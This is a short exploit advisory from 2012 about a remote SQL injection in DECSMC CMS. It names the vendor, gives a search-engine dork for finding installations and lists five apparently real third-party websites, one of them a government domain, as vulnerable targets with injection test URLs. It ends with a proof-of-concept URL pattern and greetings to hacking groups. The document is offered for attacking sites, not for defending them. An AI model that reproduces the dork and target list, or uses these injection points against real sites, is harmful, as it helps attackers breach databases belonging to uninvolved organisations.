DECSMC CMS suffers from a remote SQL injection vulnerability.
25008bb10b256404aea8b5914190532c12596baccc4559dba944b974ed4a028c
##################################################
##################################################
# Exploit Title: DECSMC CMS Vuln [ Sqli ]
# Vendor: http://www.inter-dec.com
# Date: 16/06/2012
# Author: xDarkSton3x
#Website: http://www.insecurityperu.org - http://xdarkstonex.blogspot.com
#Dork: intext:Powered by DECSMC
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Example Sites :
http://www.vidaintegral.org/home/contenidos.php?id=%27
http://www.dnpj.gob.ec/home/contenidos.php?id=%27
http://www.ednaiturralde.com/home/seccionesContenidos.php?id=%27
http://www.canycultura.com/home/contenidos.php?id=%27
http://www.proinpetrol.com/home/contenidos.php?id=%27
##################################################
[~]Exploit/p0c :
http://www.site.com/home/contenidos.php?id=[Sqli]
Greetz: [ InsecurityPeru ] - [ Rs4 - B4nz0k - FailSoft - W4rn1ng - Dedalo - Maztor ]